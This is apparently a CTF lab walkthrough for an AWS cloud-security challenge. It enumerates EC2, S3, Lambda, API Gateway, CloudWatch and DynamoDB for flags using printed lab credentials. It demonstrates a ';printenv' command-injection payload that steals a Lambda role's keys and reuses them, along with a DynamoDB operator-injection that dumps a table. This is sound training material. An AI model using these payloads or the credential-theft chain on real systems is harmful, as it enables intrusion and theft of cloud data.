Name Cloud Security 101 CTF: [Oct 30-Nov 3]

URL [Link]

Type CTF Weekly: All

Important Note: This document illustrates all the important steps required to complete this lab.
This is by no means a comprehensive step-by-step solution for this exercise. This is only
provided as a reference to various commands needed to complete this exercise and for your
further research on this topic. Also, note that the IP addresses and domain names might be
different in your lab.

When the lab is launched, the access credentials for the read-only user account are provided.

Note: The credentials will be different with every lab start.

Step 1:​ On your local Linux machine, set up these credentials to be used for any further
requests.

Setting up a student profile with these credentials:

Command:​ aws configure --profile student

Now, enter the ​Access Key ID:​ AKIAUAWOPGE5ILIPDS5X


And the ​Secret Access Key:​ XKiZ2Yu/ks2aWr2b74edF4OMbs5Em97aeV+IeL6D

Leave the region name and the output format at their default values (i.e., None).
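The same profile can also be used from Python. A minimal boto3 sketch to confirm the credentials work (get_caller_identity also reveals which principal the keys belong to):

import boto3

# Load the profile created with `aws configure --profile student`
session = boto3.Session(profile_name="student")

# STS works even though no default region is set in the profile
sts = session.client("sts", region_name="us-east-1")
print(sts.get_caller_identity()["Arn"])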
Step 2: Checking different services for information that is interesting from an attacker's perspective.

Since this is a recon-based challenge, try to access services like EC2, S3, and Lambda, see what is accessible using the profile configured above, and look for anything useful to an attacker.

1. EC2 Instances: They might contain something interesting in their userdata (provisioning scripts), such as hardcoded credentials or confidential resource names/URLs.

Retrieving the list of instances along with more information on those instances:

Command:​ aws ec2 describe-instances --profile student

Notice that a region must be specified to make the above request. This holds true for all services: resources might be located in different regions, so the region name must be specified to access them.

The number of regions is finite, so it is not much work to enumerate all of them and find the interesting instances.
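This enumeration can be scripted. A minimal boto3 sketch (assuming the read-only role permits ec2:DescribeRegions and ec2:DescribeInstances):

import boto3

session = boto3.Session(profile_name="student")

# Enumerate every region, then list the instances (and their tags) in each one
regions = session.client("ec2", region_name="us-east-1").describe_regions()["Regions"]
for region in regions:
    name = region["RegionName"]
    ec2 = session.client("ec2", region_name=name)
    for reservation in ec2.describe_instances()["Reservations"]:
        for instance in reservation["Instances"]:
            print(name, instance["InstanceId"], instance.get("Tags", []))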

Use the following commands to look for instances in us-east-1, ap-southeast-1 and
ap-southeast-2 regions respectively:

Commands:
aws ec2 describe-instances --profile student --region us-east-1
aws ec2 describe-instances --profile student --region ap-southeast-1
aws ec2 describe-instances --profile student --region ap-southeast-2
Notice that the tags for the instance in ap-southeast-2 (Asia Pacific (Sydney)) region contain a
flag.

FLAG1:​ 0cd68e3e7763d993307b65ea0facf740

Looking for the instance userdata:

Command: aws ec2 describe-instance-attribute --attribute userData --instance-id i-0e9da9de15b10ab58 --profile student --region ap-southeast-2

This instance doesn't have any userdata. Looking for other instances in other regions:

Command:​ aws ec2 describe-instances --profile student --region eu-west-2

Checking the userdata for this instance:

Command: aws ec2 describe-instance-attribute --attribute userData --instance-id i-0a0fd26b0e9fdd85b --profile student --region eu-west-2

This instance has userdata. It is base64-encoded.

Decoding the userdata:

Command: echo IyEgL2Jpbi9iYXNoCgoKVVJMPSJodHRwczovLzI3NjM4NDY1NzcyMi5zaWduaW4uYXdzLmFtYXpvbi5jb20vY29uc29sZSIKSUFNX1VTRVJOQU1FPSJkYXZlIgpJQU1fUEFTU1dPUkQ9IkRhdjNUaDNEZXZlbG9wZXIxMi8xMi8xOTkyIgpTM19SRUdJT049InVzLWVhc3QtMiIKUzNfQlVDS0VUPSJkZXZlbG9wZXJzLXNlY3JldC1idWNrZXQiClMzX0ZPTERFUj0iZGF2ZS1zaGFyZWQtYnVja2V0IgoKCnB5dGhvbjMgZ2VuZXJhdGVfbGF5b3V0LnB5ICRVUkwgJElBTV9VU0VSTkFNRSAkSUFNX1BBU1NXT1JEICRTM19SRUdJT04gJFMzX0JVQ0tFVCAkUzNfRk9MREVS | base64 -d

Notice that the userdata script contains the details of an S3 bucket.
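The fetch-and-decode can also be done in one step with boto3 (a sketch, using the instance ID and region found above):

import base64
import boto3

session = boto3.Session(profile_name="student")
ec2 = session.client("ec2", region_name="eu-west-2")

# The userData attribute is returned base64-encoded; decode it to recover
# the provisioning script
attr = ec2.describe_instance_attribute(
    InstanceId="i-0a0fd26b0e9fdd85b", Attribute="userData"
)
print(base64.b64decode(attr["UserData"]["Value"]).decode())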

Step 3: Checking the contents of the S3 bucket whose details were obtained in the previous step.

Command:​ aws s3 ls s3://developers-secret-bucket --profile student --region us-east-2

Notice that object listing is disabled on this bucket. This is where the object details from the userdata come in handy!

Retrieving the list of keys inside the bucket folder retrieved from the userdata script:

Commands:
aws s3 ls s3://developers-secret-bucket/dave-shared-bucket --profile student --region us-east-2
aws s3 ls s3://developers-secret-bucket/dave-shared-bucket/ --profile student --region us-east-2
Notice that there is a key named [Link] present in the bucket retrieved above.

Retrieving the flag:

Commands:
aws s3 cp s3://developers-secret-bucket/dave-shared-bucket/[Link] . --profile student --region us-east-2
cat [Link]

FLAG2:​ 305f19a9072a580f2de275c57e5c16c0
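The same prefix listing and download can be scripted with boto3 (a sketch; listing is denied at the bucket root, but the prefix learned from the userdata script can still be listed):

import boto3

session = boto3.Session(profile_name="student")
s3 = session.client("s3", region_name="us-east-2")

resp = s3.list_objects_v2(Bucket="developers-secret-bucket", Prefix="dave-shared-bucket/")
for obj in resp.get("Contents", []):
    key = obj["Key"]
    print(key)
    if not key.endswith("/"):  # skip the folder placeholder object, if present
        s3.download_file("developers-secret-bucket", key, key.split("/")[-1])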

Step 4:​ Listing all the S3 buckets accessible via the student profile credentials.

Command:​ aws s3 ls --profile student


Step 5:​ Accessing the "temporary-public-image-store" bucket.

Command:​ aws s3 ls s3://temporary-public-image-store --profile student

Notice that the List Objects permission is denied on this bucket as well.

Step 6:​ Checking for any other service to gain access to this S3 bucket.

Lambda:

Checking the list of Lambda functions using the student profile in different regions. It turns out that the ap-southeast-1 region has a lambda function that makes use of the above bucket:

Command:​ aws lambda list-functions --profile student --region ap-southeast-1


Step 7:​ Retrieving the code for the lambda function discovered in the previous step.

Command: aws lambda get-function --function-name serverlessrepo-image-uploader-uploader-RM72CSUT4KDA --profile student --region ap-southeast-1

Use the link received in the above output to download the code for the lambda function.

Note:​ The link to download the code is valid for 10 minutes only!
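Alternatively, a boto3 sketch that fetches the presigned code URL and downloads the archive before the link expires (standard library only, besides boto3):

import urllib.request
import boto3

session = boto3.Session(profile_name="student")
lam = session.client("lambda", region_name="ap-southeast-1")

resp = lam.get_function(
    FunctionName="serverlessrepo-image-uploader-uploader-RM72CSUT4KDA"
)
# Code.Location is a presigned S3 URL for the deployment package
urllib.request.urlretrieve(resp["Code"]["Location"], "/tmp/function.zip")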
The lambda function’s code is downloaded as a zip archive. Extracting the files:

Commands:
file ~/Downloads/serverlessrepo-image-uploader-uploader-RM72CSUT4KDA-047aaaaa-6128-4d7e-99aa-fad8ec55b662
unzip ~/Downloads/serverlessrepo-image-uploader-uploader-RM72CSUT4KDA-047aaaaa-6128-4d7e-99aa-fad8ec55b662 -d /tmp/webapp

The application code has been extracted to the /tmp/webapp directory.

Since this is a Node.js application, look for anything that might lead to a compromise of the function, such as RCE or some other injection vulnerability:

Command:​ grep exec /tmp/webapp/src/[Link]


The [Link] code contains a command injection issue where the exec function is used. The payload (the "key" parameter, which is the name of the uploaded file) is attacker-controlled.

Also, if there is an error while uploading the file, the stdout variable containing the output of the exec command is returned in the response.

Hence, using this vulnerability, an attacker can read the environment variables of the lambda function and obtain the access credentials of the role attached to it.

Also, since this application serves backend logic (Node.js based), it must be using API Gateway to expose the lambda function to the public.

Step 8:​ Determining the URL of the API Gateway to invoke the lambda function retrieved in the
previous step.

Checking the list of API Gateway REST APIs.

Command:​ aws apigateway get-rest-apis --profile student --region ap-southeast-1


Notice there is one REST API present in the ap-southeast-1 region, and its name, "image-uploader", relates to the lambda function and the S3 bucket discovered before!

The ID of the REST API is: "cwlw44ht84"

REST API URL:​ ​[Link]

Accessing the endpoint in the browser returns Forbidden.

Checking for the stages for this REST API:

Command: aws apigateway get-stages --rest-api-id cwlw44ht84 --profile student --region ap-southeast-1

There are 2 stage names: Prod and Stage
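REST APIs deployed on API Gateway are invoked at a well-known URL pattern, so the candidate URLs can be derived directly from the API ID, region, and stage names (a short sketch):

# Standard invoke URL format for an API Gateway REST API:
#   https://{rest-api-id}.execute-api.{region}.amazonaws.com/{stage}/
api_id, region = "cwlw44ht84", "ap-southeast-1"
for stage in ["Prod", "Stage"]:
    print(f"https://{api_id}.execute-api.{region}.amazonaws.com/{stage}/")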

Step 9:​ Accessing the ​Prod​ stage of the above discovered REST API.

URL:​ ​[Link]

A web page with a file upload feature opens.


Step 10:​ Exploiting the command execution issue in the application to retrieve the access
credentials associated with the role attached to the lambda function.

On the web page available from the above retrieved URL, upload a file:

File to be uploaded:​ hello_world.txt

The uploaded file contains the text: "Hello, World!"

Note:​ Make sure to use BurpSuite to intercept all the HTTPS traffic.

Press Ctrl+R to send the above request to the Repeater window.

Now, append the following payload to the filename:

Payload:​ ;printenv

The above payload would execute the printenv command in the environment of the lambda
function and return the output containing the access credentials of the role associated with the
lambda function:
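For repeatability, the exploit can also be scripted. The sketch below assumes the page performs a plain multipart upload to a /upload path on the Prod stage and that the uploaded filename ends up in the injected "key" parameter; the path and field name are assumptions, so mirror the exact request captured in Burp:

import requests  # third-party: pip install requests

# Hypothetical endpoint: substitute the real path observed in Burp
url = "https://cwlw44ht84.execute-api.ap-southeast-1.amazonaws.com/Prod/upload"

# The filename carries the injection: ";printenv" makes the shell run
# printenv after the intended command, leaking the Lambda's environment
files = {"file": ("hello_world.txt;printenv", b"Hello, World!")}

resp = requests.post(url, files=files)
print(resp.text)  # look for AWS_ACCESS_KEY_ID / AWS_SECRET_ACCESS_KEY / AWS_SESSION_TOKEN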
Setting the above obtained access credentials locally:

Commands:
export AWS_ACCESS_KEY_ID=ASIAUAWOPGE5OBKAUWG3
export AWS_SECRET_ACCESS_KEY=hrjhmLbSQbMOK7a2eYu+qEW+0NvKFj4WKv5Xszpr
export AWS_SESSION_TOKEN=IQoJb3JpZ2luX2VjEAAaDmFwLXNvdXRoZWFzdC0xIkcwRQIgAr9WFwymd00sJk05EmTNpJxJIYgGStZA05d3Zo0p7SICIQCg57Smo2UyMx7EjsCvlbWLGa15UnQr6YfHNAyr2JEWMyryAQhZEAAaDDI3NjM4NDY1NzcyMiIMVzzG9VLKUwIpW+uCKs8BuW/ovdAxglXrwA7wqHHQwXEIYoHsiw6rAy30KQsRwtZe16vPTdqB4oZvTXbjnwnllnLm7/C+h0M95LDfAsL6S+/ueihY/xGEvkxfjOZ489qc6ztAjAiNfTO6cjtq2ZH3cohzsUt5ta5+ppEomalg2fmOt+5HHyBuT7hKzFbfCO9XmAOobZ/FHd76fXKC8dR+eiOWiiQ8JGjpJJjAPzelJ7K2OkiVPIUQz+seoas1BoBfwiLHKtUFxKQmbKrJ2TqXvvJxX/bVB5crWcZUH/JEMPWQ7/wFOuAB2dmRBomn2lgfZYQ5AiR2BfikOWPzNyASySO6lS4wUCFflCHItc4RsKcAJdi/TezaALLFYj+9j5g+jNLDx3hyeEUYRs0DONhSNz+ogFvi15xXmYXfAQNvOCMTGCUVOeZXsLMLg41K+FaE2PpaIpnVtN6Jz8DaCTJxs0O2SaUe8rY7rHTbmz6YRWXZw1nZw4phRsArjmSYGRKyq/nGqJgdj07Q28J+TfsjUZHqZ1PE/6RDbw8flikdDFa1krsH+qmgXX0c6fPvbYssBlKJ+IpjPFtiGSAb+7H2uL8ruyAS0IA=

Note:​ The exported access credentials can now be used without specifying any profile to the
aws cli command (or to the boto3 client).
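For example, with the variables exported, boto3 picks up the temporary credentials automatically (a sketch):

import boto3

# No profile given: boto3 falls back to AWS_ACCESS_KEY_ID,
# AWS_SECRET_ACCESS_KEY and AWS_SESSION_TOKEN from the environment
s3 = boto3.client("s3", region_name="ap-southeast-1")
resp = s3.list_objects_v2(Bucket="temporary-public-image-store")
for obj in resp.get("Contents", []):
    print(obj["Key"])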

Now, use these credentials to access the temporary-public-image-store S3 bucket, since the lambda function must have access to it in order to upload files:

Commands:
aws s3 ls s3://temporary-public-image-store --region ap-southeast-1
aws s3 cp s3://temporary-public-image-store/[Link] . --region ap-southeast-1
cat [Link]
FLAG3:​ 58f4d2122f6e5e1e23bd0a313a7ba1af

Step 11:​ Retrieving the ARN of the resource over which an IAM user has excessive privileges.

Checking different resources like S3 and Lambda to find out the privileges:

S3:​ Checking the list of buckets accessible to the access credentials of the student profile:

Command:​ aws s3 ls --profile student

Checking the bucket policy for the 4 buckets retrieved in the above step:

Commands:
aws s3api get-bucket-policy --bucket data-extractor-repo --profile student
aws s3api get-bucket-policy --bucket developers-secret-bucket --profile student
aws s3api get-bucket-policy --bucket temporary-public-image-store --profile student
aws s3api get-bucket-policy --bucket users-personal-files --profile student

The IAM user John has excessive privileges over a folder in the users-personal-files S3 bucket.
The ARN of the resource with excessive privileges:
arn:aws:s3:::users-personal-files/Documents/james
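A boto3 sketch that loops over all accessible buckets and prints any attached policy (buckets without a policy raise an error, which is caught and reported):

import json
import boto3
from botocore.exceptions import ClientError

session = boto3.Session(profile_name="student")
s3 = session.client("s3")

for bucket in s3.list_buckets()["Buckets"]:
    name = bucket["Name"]
    try:
        policy = s3.get_bucket_policy(Bucket=name)["Policy"]
        # Pretty-print the policy document to spot overly broad statements
        print(name, json.dumps(json.loads(policy), indent=2))
    except ClientError as e:
        print(name, "-", e.response["Error"]["Code"])  # e.g. NoSuchBucketPolicy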

Step 12:​ Checking CloudWatch logs for any interesting information.

Retrieving all the log groups:

Command:​ aws logs describe-log-groups --profile student --region us-east-1

Retrieving the log streams for the above found log group:

Command: aws logs describe-log-streams --log-group-name /aws/lambda/DataExtractor --profile student --region us-east-1

Retrieving all the stream names associated with the above retrieved log group (using jq):

Command: aws logs describe-log-streams --log-group-name /aws/lambda/DataExtractor --profile student --region us-east-1 | jq ".logStreams[] | .logStreamName"

The following commands get the logs from the streams present in the log group
/aws/lambda/DataExtractor​. The retrieved logs are stored in the [Link] file.

Commands:
aws logs get-log-events --log-group-name /aws/lambda/DataExtractor --log-stream-name
'2020/10/29/[$LATEST]81c6e324b37a46baa2078ba80d1f99bc' --start-time 1603674938
--profile student --region us-east-1 >> [Link]
aws logs get-log-events --log-group-name /aws/lambda/DataExtractor --log-stream-name
'2020/10/29/[1]2bca12fd29694c788bb259dd2e25d609' --start-time 1603674938 --profile student
--region us-east-1 >> [Link]
aws logs get-log-events --log-group-name /aws/lambda/DataExtractor --log-stream-name
'2020/10/29/[1]98c9d26d340a45c9a3ee878696a0c85a' --start-time 1603674938 --profile
student --region us-east-1 >> [Link]
aws logs get-log-events --log-group-name /aws/lambda/DataExtractor --log-stream-name
'2020/10/29/[2]1e1f0fb33d044c3e830fd562a619ba1d' --start-time 1603674938 --profile student
--region us-east-1 >> [Link]

Command:​ grep -i flag [Link]

Nothing interesting was found in this log group. Checking other log groups:

Command:​ aws logs describe-log-groups --profile student --region us-west-1

Getting all the log streams:

Command: aws logs describe-log-streams --log-group-name /aws/lambda/StressTester --profile student --region us-west-1 | jq -r ".logStreams[] | .logStreamName"
Getting the logs from all the log streams obtained in the previous step and saving them in the
file [Link]:

Commands:
aws logs get-log-events --log-group-name /aws/lambda/StressTester --log-stream-name
'2020/10/29/[$LATEST]768a2fc06bd54764ba061fda9f770fcf' --start-time 1603674938 --profile
student --region us-west-1 > [Link]
aws logs get-log-events --log-group-name /aws/lambda/StressTester --log-stream-name
'2020/10/29/[$LATEST]c65c5b303ed4420985330713cd02ac06' --start-time 1603674938
--profile student --region us-west-1 >> [Link]
aws logs get-log-events --log-group-name /aws/lambda/StressTester --log-stream-name
'2020/10/29/[$LATEST]f9df679710734b6faf171077e7df08a0' --start-time 1603674938 --profile
student --region us-west-1 >> [Link]

Command:​ grep -i flag [Link]

FLAG5:​ POXdecOaIEFdOSidzH7pZOl8TwzLwxHK

Alternatively, use the following Python script (based on boto3) to get the CloudWatch logs:
Python Script:

import boto3
import json
from botocore.config import Config

config = Config(
    region_name = 'us-west-1',
    signature_version = 'v4',
    retries = {
        'max_attempts': 10,
        'mode': 'standard'
    }
)

boto3.setup_default_session(profile_name="student")

client = boto3.client("logs", config = config)

all_streams = []

group_name = input("Enter Log Group Name: ")

# Collect every log stream in the group, following the pagination token
stream_batch = client.describe_log_streams(logGroupName=group_name)
all_streams += stream_batch['logStreams']

while 'nextToken' in stream_batch:
    stream_batch = client.describe_log_streams(logGroupName=group_name, nextToken=stream_batch['nextToken'])
    all_streams += stream_batch['logStreams']

print(len(all_streams))

stream_names = [stream['logStreamName'] for stream in all_streams]

out_to = open("[Link]", 'w')

for stream in stream_names:
    logs_batch = client.get_log_events(logGroupName=group_name, logStreamName=stream)

    for event in logs_batch['events']:
        event.update({'group': group_name, 'stream': stream})
        out_to.write(json.dumps(event) + '\n')

    print(stream, ":", len(logs_batch['events']))

    # get_log_events paginates via nextForwardToken; the same token is
    # returned again once the stream is exhausted, which ends this loop
    while True:
        prev_token = logs_batch['nextForwardToken']
        logs_batch = client.get_log_events(logGroupName=group_name, logStreamName=stream, nextToken=prev_token)
        if logs_batch['nextForwardToken'] == prev_token:
            break
        for event in logs_batch['events']:
            event.update({'group': group_name, 'stream': stream})
            out_to.write(json.dumps(event) + '\n')

out_to.close()

Reference:​ ​[Link]

To get the CloudWatch logs, the script first retrieves the log streams associated with the supplied log group, and then fetches the events from each stream.
When a stream holds more events than one response can return, the results are paginated: the token returned with each batch is passed back to retrieve the next batch.

Running the above script to gather the logs in ​[Link]​ file:

Command:​ python3 [Link]

Retrieving the flag from the logs:

Command:​ grep -i flag [Link]


FLAG5:​ POXdecOaIEFdOSidzH7pZOl8TwzLwxHK

Alternatively, using the awslogs utility to retrieve the CloudWatch logs:

Set up the default region to us-west-1 using the aws cli:

Command: aws configure

Press Enter to skip the Access Key ID and Secret Access Key prompts, set the region name to us-west-1, and leave the output format at its default value (None).

Now, retrieving the logs using the awslogs utility:

Command:​ awslogs get /aws/lambda/StressTester --profile student

It doesn't retrieve any logs. This is because the default start time is later than the time at which the last log event was recorded.

Hence, to retrieve the logs, using the --start flag:

Command:​ awslogs get /aws/lambda/StressTester --start '2d' --profile student | grep -i flag
FLAG5:​ POXdecOaIEFdOSidzH7pZOl8TwzLwxHK

Note: The number of days specified in the above command will need to increase as time passes. The logs are returned only when the supplied start time is earlier than the time at which the log events were recorded.

Step 13:​ Checking other S3 buckets for interesting information.

Command:​ aws s3 ls --profile student

Checking the contents of the ​data-extractor-repo​ bucket:

Command:​ aws s3api list-objects --bucket data-extractor-repo --profile student

Checking if there are more versions of the objects in this bucket:
Command:​ aws s3api list-object-versions --bucket data-extractor-repo --profile student

Since all the entries are for [Link], retrieving the different versions for it:
Command: aws s3api list-object-versions --bucket data-extractor-repo --profile student | jq -r ".Versions[] | .VersionId"

Downloading all the versions for the [Link] archive:

Commands:
aws s3api get-object --bucket data-extractor-repo --key [Link] --version-id S5l9yGDb_u0XR96U3tQexZMtmn1t6HUZ [Link] --profile student
aws s3api get-object --bucket data-extractor-repo --key [Link] --version-id Fe2_PrN_yD_rgKffS2NqqGN1Yozxg0Jz [Link] --profile student
aws s3api get-object --bucket data-extractor-repo --key [Link] --version-id gvX.eTnEDenuevPEbmJxrLXOscbQ_.l6 [Link] --profile student
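Equivalently, a boto3 sketch that downloads every version of the archive in a loop (the local names code_v0.zip, code_v1.zip, ... are illustrative):

import boto3

session = boto3.Session(profile_name="student")
s3 = session.client("s3")

versions = s3.list_object_versions(Bucket="data-extractor-repo")["Versions"]
for i, v in enumerate(versions):
    # Fetch each historical version of the object by its VersionId
    obj = s3.get_object(Bucket="data-extractor-repo", Key=v["Key"], VersionId=v["VersionId"])
    with open(f"code_v{i}.zip", "wb") as f:
        f.write(obj["Body"].read())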
Extracting the content of the zip archives and checking for any flags in there:

Commands:
unzip -o [Link]
grep -i flag lambda_function.py
unzip -o [Link]
grep -i flag lambda_function.py
FLAG6:​ lbg6HNDzO2nyzVnxHDd7uptrGldYVzVV

Checking the definition of this lambda function that contains the flag:

Command:​ less lambda_function.py


Notice the initial comments in the code: there is an API Gateway that invokes the lambda function. The lambda function in turn retrieves data from DynamoDB and sends the result back through the API Gateway.

Step 14:​ Retrieving the URL of the API Gateway.

Try different regions until some API Gateway REST APIs are retrieved:

Commands:
aws apigateway get-rest-apis --profile student --region us-east-1
aws apigateway get-rest-apis --profile student --region us-east-2
aws apigateway get-rest-apis --profile student --region us-west-1
aws apigateway get-rest-apis --profile student --region us-west-2
API Gateway URL:​ ​[Link]

Open the URL in the browser:


Checking the stages for the deployed API:

Command: aws apigateway get-stages --rest-api-id wjpu20uslg --profile student --region us-west-2

The stage name is "card-details".

Step 15:​ Checking the resources for the REST API discovered in the previous step.

Command: aws apigateway get-resources --rest-api-id wjpu20uslg --profile student --region us-west-2

Notice that there are 3 resources having paths /v1, /v2 and /latest. All of these resources have a POST method.

Checking the code extracted from [Link]:

Command:​ unzip -o [Link]


Notice that this function takes a CardHolder parameter, which is then passed to the getDataFromLambda function that extracts the data from the DynamoDB database.

Using the information gathered from the above function, calling the /latest resource of the REST API:

Command: curl -X POST [Link] -d '{ "CardHolder": "Random"}'

The response is empty. So the supplied card holder name doesn’t exist in DynamoDB.
There were 2 other endpoints as well, namely: ​/v1​ and ​/v2

These endpoints must be invoking the other lambda functions.

Step 16:​ Checking the list of lambda functions.

Command:​ aws lambda list-functions --profile student --region us-west-2

Step 17:​ Checking the versions of the DataExtractor function.

Command: aws lambda list-versions-by-function --function-name DataExtractor --profile student --region us-west-2

Notice that there are 3 versions of the DataExtractor function. Compare the CodeSha256 values of the 3 function versions: the first one ($LATEST) and the last one (version 2) have the same SHA256 hash.

Hence, $LATEST and v2 are the same function and v1 is a different function.
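A quick boto3 sketch to print each version's CodeSha256 side by side:

import boto3

session = boto3.Session(profile_name="student")
lam = session.client("lambda", region_name="us-west-2")

# Versions with identical CodeSha256 values contain identical code
for v in lam.list_versions_by_function(FunctionName="DataExtractor")["Versions"]:
    print(v["Version"], v["CodeSha256"])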

Step 18: Retrieving the code for the v1 function.

Command: aws lambda get-function --function-name DataExtractor --qualifier 1 --profile student --region us-west-2
Downloading the code using the above retrieved URL.

Commands:
ls ~/Downloads/
unzip ~/Downloads/DataExtractor-68356e6d-ca7c-4abf-885b-eb77f3b9070e -d /tmp/lambda

Command:​ vim /tmp/lambda/lambda_function.py


Notice that the lambda function (v1) accepts an Operator parameter as well, which is passed to the scan function to retrieve the data from DynamoDB.

Here, DynamoDB injection is possible via this lambda function.
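To see why this is injectable, here is a sketch of the kind of scan call the v1 function presumably builds; the exact code is in the extracted lambda_function.py, so treat this as an illustration rather than the verbatim implementation:

import boto3

session = boto3.Session(profile_name="student")
dynamodb = session.client("dynamodb", region_name="us-east-1")

# The caller controls both the value and the comparison operator. With
# Operator = "NE" and a CardHolder that matches nothing, the filter becomes
# "CardHolder != 'Random'", which is true for every item in the table.
response = dynamodb.scan(
    TableName="CardDetails",
    ScanFilter={
        "CardHolder": {
            "AttributeValueList": [{"S": "Random"}],
            "ComparisonOperator": "NE",  # injected in place of the intended "EQ"
        }
    },
)
print(response["Items"])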

Step 19:​ Retrieving the data from DynamoDB using the injection attack.

Command: curl -X POST [Link] -d '{ "CardHolder": "Random", "Operator": "NE" }'
FLAG7:​ 6011805887357131

The whole database was dumped because the NE (Not Equal) operator matches every entry: as seen in the previous request, there is no entry named "Random" in the database, so every record satisfies the filter.

Another possible way to retrieve the DynamoDB flag is to get it directly from the database using the student profile access credentials, because the student user has read-only access to all AWS services.

As seen in the lambda_function.py code, the database is located in the us-east-1 region:

Command:​ head -n20 /tmp/lambda/lambda_function.py


Command:​ aws dynamodb list-tables --profile student --region us-east-1

Retrieving the data from the DynamoDB table:

Command:​ aws dynamodb scan --table-name CardDetails --profile student --region us-east-1
Retrieving the flag:

Command:​ aws dynamodb scan --table-name CardDetails --profile student --region us-east-1 |
grep -iC5 flag

FLAG7:​ 6011805887357131

References:

1. EC2 ([Link])
2. S3 ([Link])
3. API Gateway ([Link])
4. Lambda ([Link])
5. DynamoDB ([Link])
6. CloudWatch ([Link])
7. AWS CLI ([Link])
8. Boto3 ([Link])
9. awslogs ([Link])
